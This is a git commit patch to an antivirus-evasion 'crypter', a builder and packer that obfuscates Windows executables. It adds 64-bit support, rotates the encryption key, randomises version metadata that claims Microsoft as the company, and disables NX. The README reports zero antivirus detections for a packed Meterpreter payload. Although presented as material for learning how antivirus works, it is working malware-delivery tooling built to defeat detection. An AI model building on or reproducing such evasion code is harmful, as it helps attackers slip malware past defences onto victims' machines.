From 4c45ea84222db21378fb7f58f77692b659ac5c02 Mon Sep 17 00:00:00 2001 From: ALittlePatate Date: Tue, 19 Mar 2024 10:29:40 +0100 Subject: [PATCH] add: x64 bit support, automatic detection of architecture, 0/40 detects in x64 bit --- Builder/gui.py | 23 +++++++++++++++++++++-- Builder/obfuscation.py | 4 ++-- Builder/requirements.txt | 3 ++- Crypter/config.h | 2 +- Crypter/patate-crypter.rc | 8 ++++---- Crypter/patate-crypter.vcxproj | 19 ++++++++++++------- Crypter/patate-crypter.vcxproj.filters | 6 ------ README.md | 5 +++-- 8 files changed, 45 insertions(+), 25 deletions(-) diff --git a/Builder/gui.py b/Builder/gui.py index 14bd21b..fd1605d 100644 --- a/Builder/gui.py +++ b/Builder/gui.py @@ -37,6 +37,7 @@ from PyQt5.QtGui import QPixmap from obfuscation import obfuscate from metadata import change_metadata import os, shutil, glob +import pefile class Ui_mainWindow(object): def __init__(self) : @@ -141,6 +142,7 @@ class Ui_mainWindow(object): self.checkBox_3.setText(_translate("mainWindow", "Control flow")) def generate(self) : + is_64bit = False in_filename = self.filepath out_filename = "../bin/" + self.pushButton.text().split(".")[0] + "_out.exe" xor_key = '' @@ -155,6 +157,19 @@ class Ui_mainWindow(object): QCoreApplication.processEvents() return + try : + pe = pefile.PE(in_filename) + except : + self.label_2.setText("File is not a binary.") + QCoreApplication.processEvents() + return + if hex(pe.FILE_HEADER.Machine) == '0x14c': + self.label_2.setText("File is a 32-bit binary") + else: + self.label_2.setText("File is a 64-bit binary") + is_64bit = True + QCoreApplication.processEvents() + self.label_2.setText("Creating sample header...") QCoreApplication.processEvents() @@ -184,7 +199,7 @@ class Ui_mainWindow(object): self.label_2.setText("Adding junk code...") QCoreApplication.processEvents() - obfuscate(self.spinBox.value(), self.spinBox_2.value(), self.cflow, self.junk) + obfuscate(self.spinBox.value(), self.spinBox_2.value(), self.cflow, self.junk, is_64bit) self.label_2.setText("done.") QCoreApplication.processEvents() @@ -201,7 +216,11 @@ class Ui_mainWindow(object): vs_path = os.popen("\"%ProgramFiles(x86)%/Microsoft Visual Studio/Installer/vswhere.exe\" -nologo -latest -property installationPath").read().replace("\n","") #https://stackoverflow.com/questions/46223916/msbuild-exe-not-found-cmd-exe cmd_line = vs_path + "\\Msbuild\\Current\\Bin\\MSBuild.exe" - return_code = os.system("\""+cmd_line+"\" ../Crypter /p:Configuration=Release;Platform=x86;OutDir=.;DebugSymbols=false;DebugType=None;Zm=5000;TargetExt=.exe;TargetName="+out_filename.replace(".exe", "")+" /t:Rebuild") + if is_64bit : + return_code = os.system("\""+cmd_line+"\" ../Crypter /p:Configuration=Release;Platform=x64;OutDir=.;DebugSymbols=false;DebugType=None;Zm=5000;TargetExt=.exe;TargetName="+out_filename.replace(".exe", "")+" /t:Rebuild") + else : + return_code = os.system("\""+cmd_line+"\" ../Crypter /p:Configuration=Release;Platform=x86;OutDir=.;DebugSymbols=false;DebugType=None;Zm=5000;TargetExt=.exe;TargetName="+out_filename.replace(".exe", "")+" /t:Rebuild") + if return_code : self.label_2.setText("build failed.") diff --git a/Builder/obfuscation.py b/Builder/obfuscation.py index 679c929..d4a35ac 100644 --- a/Builder/obfuscation.py +++ b/Builder/obfuscation.py @@ -149,7 +149,7 @@ def GetRandomControlFlow(): return cpp_code FILES_TO_OBFUSCATE = {"../Crypter/main.cpp":"../Crypter/DO_NOT_TOUCH.cpp"}# "getapi.cpp":"DO_NOT_TOUCH_API.cpp"} -def obfuscate(PASS, CFLOW_PASS, cflow, junk) : +def obfuscate(PASS, CFLOW_PASS, cflow, junk, is64bit) : if PASS < CFLOW_PASS : PASS = CFLOW_PASS if not cflow and not junk : PASS = 0 @@ -237,7 +237,7 @@ def obfuscate(PASS, CFLOW_PASS, cflow, junk) : if GetRandomBool() and in_func : # do we call a function ? out.append(CallRandomFunction()+"\n") - if GetRandomBool() and in_func and cflow and k < CFLOW_PASS : # do we mess up control flow ? + if GetRandomBool() and in_func and cflow and k < CFLOW_PASS and not is64bit : # do we mess up control flow ? out.append(GetRandomAssemblyBlock()+"\n") if GetRandomBool() and in_func and cflow and k < CFLOW_PASS : # do we mess up control flow ? diff --git a/Builder/requirements.txt b/Builder/requirements.txt index df7496a..3722897 100644 --- a/Builder/requirements.txt +++ b/Builder/requirements.txt @@ -1,2 +1,3 @@ pillow -pywin32 \ No newline at end of file +pywin32 +pefile \ No newline at end of file diff --git a/Crypter/config.h b/Crypter/config.h index 7961931..050b930 100644 --- a/Crypter/config.h +++ b/Crypter/config.h @@ -1,2 +1,2 @@ #pragma once -#define KEY "mkhjqsdhfjbzqfcqzf" \ No newline at end of file +#define KEY "pqihzifvqzidbzq" \ No newline at end of file diff --git a/Crypter/patate-crypter.rc b/Crypter/patate-crypter.rc index 3370a49..7e1cd16 100644 --- a/Crypter/patate-crypter.rc +++ b/Crypter/patate-crypter.rc @@ -68,12 +68,12 @@ BEGIN BLOCK "040c04b0" BEGIN VALUE "CompanyName", "Microsoft" - VALUE "FileDescription", "clgdknugqsthezarlwbq" + VALUE "FileDescription", "mwqaxnynrtvjaafmtwew" VALUE "FileVersion", "1.0.0.1" - VALUE "InternalName", "yhoqres.exe" + VALUE "InternalName", "hoflypx.exe" VALUE "LegalCopyright", "Copyright (C) 2023" - VALUE "OriginalFilename", "erbggay.exe" - VALUE "ProductName", "awwmoqx.exe" + VALUE "OriginalFilename", "ckhvspq.exe" + VALUE "ProductName", "rrrxbyl.exe" VALUE "ProductVersion", "1.0.0.1" END END diff --git a/Crypter/patate-crypter.vcxproj b/Crypter/patate-crypter.vcxproj index 4c4935b..7f73446 100644 --- a/Crypter/patate-crypter.vcxproj +++ b/Crypter/patate-crypter.vcxproj @@ -49,7 +49,7 @@ Application false v143 - true + false MultiByte @@ -138,6 +138,7 @@ _DEBUG;_CONSOLE;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS true stdcpp17 + false Console @@ -148,20 +149,24 @@ Level3 - true - true + false + false true NDEBUG;_CONSOLE;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS true stdcpp17 MultiThreaded + Disabled + false + EnableFastChecks - Console - true - true - true + Windows + false + false + false /NXCOMPAT:no %(AdditionalOptions) + false diff --git a/Crypter/patate-crypter.vcxproj.filters b/Crypter/patate-crypter.vcxproj.filters index 6ebff34..db9ee56 100644 --- a/Crypter/patate-crypter.vcxproj.filters +++ b/Crypter/patate-crypter.vcxproj.filters @@ -18,9 +18,6 @@ Fichiers sources - - Fichiers sources - @@ -32,9 +29,6 @@ Fichiers d%27en-tĂȘte - - Fichiers d%27en-tĂȘte - diff --git a/README.md b/README.md index eb4c8e3..2edbf79 100644 --- a/README.md +++ b/README.md @@ -4,14 +4,15 @@ The project structure is **very** messy because i wasn't planning on releasing i I will not provide any support for running the program, it is only made for people interested in cyber security to learn more about how AV work. # Limitations -patate crypter officially supports 32bit DLLs and PEs. It might be possible to add x64 bit support without too much issues, but i never tried, maybe one day.
+patate crypter officially supports 32bit and 64bit DLLs and PEs.
There is an issue where the reallocations would fail for specific payloads, TOFIX.
There is code in the `metadata.py` file to generate random BMP images in the metadata of the PE but it makes the entropy go way to high (from 6.4 to 7.4) (see [link](https://practicalsecurityanalytics.com/file-entropy/)). # Detection rate There is currently 0/40 detections for a crypted meterperter : - [original meterpreter](https://www.kleenscan.com/scan_result/6ea55d54a947393082f524215c28185ef90a7ec9cb9c50f25c555715b61b0e3e) -- [crypted](https://www.kleenscan.com/scan_result/697277eeddc7cf01ffc81430e3c549488e3a96970edb9ec8d96860d9135eac54) +- [crypted 32 bit](https://www.kleenscan.com/scan_result/697277eeddc7cf01ffc81430e3c549488e3a96970edb9ec8d96860d9135eac54) +- [crypted 64 bit](https://www.kleenscan.com/scan_result/9c0ae91e19425ff4c2d8120f1cb787f0480c7780faa6e1e57517b2aea831e272) # How does it work ? The crypter (compile time) works by :